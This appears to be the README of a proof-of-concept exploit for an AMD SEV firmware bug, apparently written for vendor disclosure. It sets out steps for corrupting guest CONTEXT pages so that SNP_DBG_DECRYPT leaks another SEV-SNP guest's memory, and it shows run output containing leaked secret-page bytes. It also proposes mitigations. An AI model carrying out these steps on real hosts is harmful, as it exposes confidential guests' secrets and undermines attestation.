This repo contains an exploit for a vulnerability in the SEV firmware. The exploit allows decrypting arbitrary memory of a running SEV-SNP guest.
Tested on version 1.55.16 (latest as of the time of writing).
The nv_paddr
field of the SEV_INIT_EX
command can be used to donate a chunk of memory to the firmware, so that it can be used instead of the persistent flash. If SEV-SNP is enabled, this memory has to be in the FIRMWARE
state. The firmware checks this once while executing the SEV_INIT_EX
command. From thereon after, the firmware assumes that this memory is in the FIRMWARE
state and writes to it without any additional checks.
The assumption that the memory is still in the FIRMWARE
state is not always correct, nothing prevents the host from changing the state back to the HYPERVISOR
state using the SNP_PAGE_RECLAIM
command. Once the pages are in the HYPERVISOR
state they can be transitioned into other states e.g. CONTEXT
. Even though the pages are no longer in the FIRMWARE
state, the firmware will write to those pages thus breaking the integrity required by certain page states.
We can exploit this memory corruption by targeting CONTEXT
pages. CONTEXT
pages are powerful target, but there are some problems:
CONTEXT
pages are encrypted with a key than other memory. As a result, it's not easy to control the plaintext even if we could control the ciphertext.- We don't have a lot of control of the memory written by the firmware.
The memory corruption effectively fills the CONTEXT
page with random data, so it's not easy to actually corrupt CONTEXT
pages in such a way that it's useful for the attacker. To work around that, we can repeatedly trigger the bug to cause corruption and use the SNP_GUEST_STATUS
command the read back relevant fields of the corrupted CONTEXT
page until we observe values that are useful.
The SNP_DBG_DECRYPT
command can be used to decrypt the memory of a SEV-SNP guest with the DEBUG
policy enabled. If we can craft a CONTEXT
so that it has the DEBUG
flag set and contains the ASID
of another guest, we can use it to decrypt the memory of the other guest even though it doesn't have DEBUG
policy set.
It turns out that SNP_DBG_DECRYPT
ignores most fields in the CONTEXT
page, it only checks gctx->guest.asid
, gctx->guest.policy_snp
and gctx->guest.guest_flags
. The chance of these fields being correct after the memory corruption is not high, but it's also not out of the realm of possibility. The good news is also that we can read all of those fields using the GUEST_STATUS
command.
In conclusion, we can exploit the bug with the following steps:
- Transition
nv_paddr
into theFIRMWARE
state using thermpupdate
instruction. - Execute the
SEV_INIT_EX
command. - Transition
nv_paddr
back into theHYPERVISOR
state using theSNP_RECLAIM_PAGE
command. - Create one or more
CONTEXT
pages atnv_paddr
. - Trick the firmware into writing to
nv_paddr
using theSEV_PDH_GEN
command. This corrupts theCONTEXT
pages. - Use the
GUEST_STATUS
command to check whetherSNP_DBG_DECRYPT
would succeed, if not go back to step 5. The main bottleneck here is that ASIDs are stored in a 32-bit int, but there are way fewer valid ASIDs (509 or 1006 depending on the CPU), so it will take quite a lot of attempts to get this right. - Launch (and optionally run) a victim guest using the corrupted ASID in the corrupted
CONTEXT
page. Keep track of the secrets page. This is possible because the SEV firmware tracks active ASIDs internally and doesn't check the activeCONTEXT
pages to check for duplicates. - Use the corrupted
CONTEXT
page to executeSNP_DBG_DECRYPT
on the secrets page of the victim guest.
The exploit spends most of its time on steps 5 and 6. The chances of hitting all the right conditions are about 1/20,000,000 on an EPYC Milan and we can do about 100 attempts per second, so we expect to hit the right conditions about once every two days (Warning: the calculations are only approximations and I may have messed something up, but anecdotally, once every two days feels about right). We can speed this up by not just attacking one CONTEXT
page at a time, but three CONTEXT
pages at nv_paddr
, nv_paddr+4096
, and nv_paddr+8192
(SEV_PDG_GEN
will corrupt three pages). Conveniently those steps can be done ahead of launching the victim guest and only have to succeed once to attack an arbitrary number of guests (note that the PoC currently attacks just one guest though).
Although I haven't been able to test this yet, I believe that once an attacker has used this vulnerability to leak the guest's virtual machine platform communication keys, she should be able to send guest messages to the firmware on the guest's behalf and use this to request attestation reports. This violates a key principle of SEV-SNP in which only the guest should be able to request attestion reports.
A few commands (e.g. SNP_RECLAIM_PAGE
, SNP_GCTX_CREATE
, RING_BUFFER
, maybe more?, maybe all just to be safe?) that accept a FIRMWARE
page should check whether it overlaps with nv_paddr
and fail if it does.
There's one more concern I have, which I'm not sure is valid and would love to hear y'all's opinion on: IIUC the SEV firmware can be upgraded without interrupting running guests. This implies to me that it would be possible to carry over the corrupted CONTEXT
page from an old vulnerable firmware version to a new fixed firmware version. Would it be possible to start on an older vulnerable version, do the exploit described above, upgrade and commit the new fixed firmware, launch the guest with the new firmware (so that the old firmware version doesn't show up in the attestation report) and then use the corrupted CONTEXT
page created using the old firmware to attack the guest creating using the new version? Would a consumer of the attestion reports created by the new guest be able to tell that the old firmware version was running at some point before the new guest was launched? If not, are further mitigations required to prevent this from happening?
- Apply the patches in the linux-patches folder to the tip of https://github.com/AMDESE/linux/commits/snp-host-v10. Build, install, and boot the kernel.
- Run the PoC.
root@server:~/sev-exploit# cargo run --release Finished release [optimized] target(s) in 0.12s Running `target/release/sev-exploit` Corrupt guest context page so that ASID is in range 1..510 Smallest ASID: 0x0000001f iterations: 14052175 zeros: 10539628 unique asids: 31500727 elapsed time: 1d 19h 20m 31s Creating VM with same ASID [03, 00, 00, 00, 00, 00, 00, 00, 11, 0f, a0, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, f0, 51, a5, 03, 3f, 69, 6b, 93, e8, d8, 61, 0d, 2e, 5a, 45, f1, ea, 6d, bf, 49, fe, e4, a9, 2d, 8d, af, 76, 5e, 2e, 56, e0, fa, a9, b3, a7, e0, bc, 09, d9, 4f, 28, 5c, 9f, 84, d2, 7e, 34, eb, ea, 3f, 29, 88, 30, 01, 28, 65, 8b, 73, 3c, 84, 00, ae, 4a, 74, a2, 7a, d1, c7, 4f, 63, 7f, 72, 7b, 3b, 2f, 08, b3, 1a, 8c, 99, 1b, ad, b5, 1d, 42, 0b, 4d, 98, d4, 7d, c1, 0b, d6, 2f, b4, 6c, 6b, 51, a2, 92, 17, 3b, 01, e8, 82, 11, 1e, cb, cb, a2, 8f, c9, b0, 52, 1d, 1d, b7, d2, 25, 8d, 32, a9, 7a, 6f, 86, e4, 40, 44, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 80, 00, 88, 00, 00, 00, 00, ee, ff, 00, 00, f0, ff, ff, ff, ff, ff, ff, ff, ff, 3f, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, <cut off zeros>] thread 'main' panicked at src/main.rs:170:13: not yet implemented: use the leaked secrets to send guest messages note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
Note that it's normal for the exploit to run for a significant amount of time (on the order of hours if you're lucky, days if you're not). Running on an EPYC Genoa will likely be faster because there are almost two times more valid ASIDs.
During steps 5 and 6 the PoC displays some metrics:
- "Smallest ASID": The smallest ASID encountered so far. This is just a sanity check metric to make sure that we encounter smaller and smaller ASIDs over time.
- "iterations": This metric is increased every time the bug is triggered.
- "zeroes": In about 1/4 of cases, the
CONTEXT
page is in a state where the firmware considers it not to have an ASID assigned yet. In those casesSNP_GUEST_STATUS
will return0
in the ASID field. - "unique asids": Another sanity check metric just to make sure that ASIDs are random and don't repeat after some time.
- "elapsed time": Duration since the PoC was started.
In most cases decommissioning corrupted CONTEXT
pages causes a crash of the firmware (most likely here). AFAICT crashes of the firmware cause a reset of the whole system. To avoid such crashes the kernel patches prevent CONTEXT
pages from being decommissioned. One downside of this is that the ccp
kernel module cannot be unloaded. Once the PoC has been started the whole system has to be rebooted before it can be started again (regardless of whether the PoC succeeded or was aborted).